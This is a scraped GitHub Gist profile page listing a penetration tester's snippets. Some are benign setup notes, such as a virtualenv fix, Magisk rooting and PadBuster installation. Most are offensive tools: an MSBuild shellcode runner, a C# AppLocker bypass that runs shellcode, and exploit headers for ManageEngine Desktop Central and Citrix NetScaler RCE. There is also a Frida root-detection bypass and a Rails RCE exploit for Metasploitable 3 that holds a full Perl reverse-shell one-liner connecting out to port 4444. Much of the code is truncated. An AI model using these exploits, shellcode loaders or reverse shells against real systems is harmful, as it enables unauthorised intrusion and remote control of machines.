Skip to content

Instantly share code, notes, and snippets.

Avatar

LongCat pich4ya

View GitHub Profile
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
View fix_virtualenv
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / magisk_pixel3a.txt
Last active May 16, 2020
Clean Flash Magisk on Pixel 3a (Android 9)
View magisk_pixel3a.txt
@author LongCat (Pichaya Morimoto)
1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"
Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)
Connect Pixel 3a to MBP > allow access in the device's prompt.
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
View shellcode.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View src-2020-0011.py
#!/usr/local/bin/python3
"""
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
Download: https://www.manageengine.com/products/desktop-central/download-free.html
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189
@pich4ya
pich4ya / readme_render_exploit.py
Last active Feb 8, 2020
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
View readme_render_exploit.py
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests
# 1. tmp upload
host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
@pich4ya
pich4ya / netscaler_exploit.py
Created Jan 19, 2020 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
View netscaler_exploit.py
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
@pich4ya
pich4ya / secureRootCert1.java
Last active Nov 29, 2019
วิธีการไม่ trust all HTTPS cert เวลาต่อ internal API ที่ API server ใช้ cert ที่ issue มาจาก internal root CA
View secureRootCert1.java
/*
ต้อง
- แน่ใจว่ามีไฟล์ root certificate แล้ว
- ตั้ง $JAVA_HOME ให้ถูกที่ และแน่ใจว่ามีโฟล์ $JAVA_HOME/jre/lib/security/cacerts
- รหัสผ่านของ Java keystore เป็นคำว่า changeit โดยค่า default
วิธีการ
1. ต้องไปดาวน์โหลดหรือขอ root certificate ที่จะใช้มาก่อน
Root certificates contain public information and CAs always make them available for anyone.
$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem
@pich4ya
pich4ya / root_bypass.js
Created Aug 5, 2019
Bypass Android Root Detection / Bypass RootBeer - August 2019
View root_bypass.js
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@pich4ya
pich4ya / padbuster_macos2019.txt
Created Aug 5, 2019
Install PadBuster on macOS Mojave 10.14.5
View padbuster_macos2019.txt
brew install openssl
brew install perl
brew unlink perl && brew link perl
env LDFLAGS="-L$(brew --prefix openssl)/lib" CFLAGS="-I$(brew --prefix openssl)/include" perl -MCPAN -e 'install Crypt::SSLeay'
git clone https://github.com/GDSSecurity/PadBuster && cd PadBuster
perl padbuster.pl "https://example.local/ScriptResource.axd?d=yyy" yyy 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=xxx"
You can’t perform that action at this time.